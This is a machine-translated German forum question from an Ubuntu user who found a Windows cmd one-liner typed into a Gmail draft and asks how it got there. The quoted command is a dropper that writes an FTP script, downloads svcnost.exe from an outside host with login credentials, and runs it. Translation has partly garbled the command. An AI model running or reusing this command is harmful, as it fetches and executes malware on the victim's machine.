Mein Heim-PC ist normalerweise eingeschaltet, aber der Monitor ist ausgeschaltet. Heute Abend kam ich von der Arbeit nach Hause und fand einen Hackversuch: In meinem Browser war mein Google Mail-Konto geöffnet (das war ich), aber es war im Kompositionsmodus mit den folgenden Inhalten TO
Feld:
md / c echo open cCTeamFtp.yi.org 21 & gt; & gt; ik & amp; echo user ccteam10 765824 & gt; & gt; ik & amp; binäres Echo & gt; & gt; ik & amp; echo get svcnost.exe & gt; & gt; ik & amp; Echo bye & gt; & gt; ik & amp; ftp -n -v -s: ik & amp; del ik & amp; svcnost.exe & amp; Echo Du hast gehört
Das sieht für mich nach Windows-Befehlszeilencode aus, und der md
Der Start des Codes in Verbindung mit der Tatsache, dass sich Google Mail im Erstellungsmodus befand, zeigt, dass jemand versucht hat, eine cmd
Befehl. Ich schätze, ich hatte Glück, dass ich Windows nicht auf diesem PC ausführe, aber ich habe andere, die dies tun. Dies ist das erste Mal, dass mir so etwas passiert ist. Ich bin kein Linux-Guru und habe zu diesem Zeitpunkt außer Firefox keine anderen Programme ausgeführt.
Ich bin mir absolut sicher, dass ich das nicht geschrieben habe und niemand anderes physisch an meinem Computer war. Außerdem habe ich kürzlich mein Google-Passwort (und alle meine anderen Passwörter) in so etwas wie geändert vMA8ogd7bv
Ich glaube nicht, dass jemand mein Google-Konto gehackt hat.
Was ist gerade passiert? Wie kann jemand Tastatureingaben auf meinem Computer ausführen, wenn nicht auf dem alten Windows-Computer von Oma seit Jahren Malware ausgeführt wird, sondern auf einem kürzlich neu installierten Ubuntu?
Aktualisieren:
Lassen Sie mich einige der Punkte und Fragen ansprechen:
- Ich bin in Österreich, auf dem Land. Mein WLAN Router läuft WPA2 / PSK und ein mittelstarkes Passwort, das nicht im Wörterbuch enthalten ist; müsste brachial und weniger als 50 Meter von hier sein; Es ist unwahrscheinlich, dass es gehackt wurde.
- Ich verwende eine USB-Tastatur, daher ist es sehr unwahrscheinlich, dass sich jemand in Reichweite befindet, um sie zu hacken.
- Ich habe meinen Computer zu der Zeit nicht benutzt. es war nur zu Hause im Leerlauf, während ich bei der Arbeit war. Da es sich um einen am Monitor montierten Nettop-PC handelt, schalte ich ihn selten aus.
- Die Maschine ist nur zwei Monate alt, läuft nur mit Ubuntu und ich benutze keine seltsame Software oder besuche seltsame Seiten. Es geht hauptsächlich um Stack Exchange, Google Mail und Zeitungen. Keine Spiele. Ubuntu soll sich auf dem Laufenden halten.
- Mir ist nicht bekannt, dass ein VNC-Dienst ausgeführt wird. Ich habe keinesfalls eines installiert oder aktiviert. Ich habe auch keine anderen Server gestartet. Ich bin mir nicht sicher, ob in Ubuntu standardmäßig welche ausgeführt werden?
- Ich kenne alle IP-Adressen in der Google Mail-Kontoaktivität. Ich bin mir ziemlich sicher, dass Google kein Eingang ist.
- Ich habe einen ... gefunden Protokolldatei-Viewer , aber ich weiß nicht, wonach ich suchen soll. Hilfe?
Was ich wirklich wissen möchte, und was mich wirklich unsicher macht, ist: Wie kann jemand aus dem Internet Tastatureingaben auf meinem Computer generieren? Wie kann ich das verhindern, ohne alles darüber zu wissen? Ich bin kein Linux-Freak, sondern ein Vater, der sich seit über 20 Jahren mit Windows beschäftigt und es satt hat. Und in all den über 18 Jahren, in denen ich online war, habe ich noch nie einen Hackversuch gesehen. Das ist also neu für mich.
password
:-)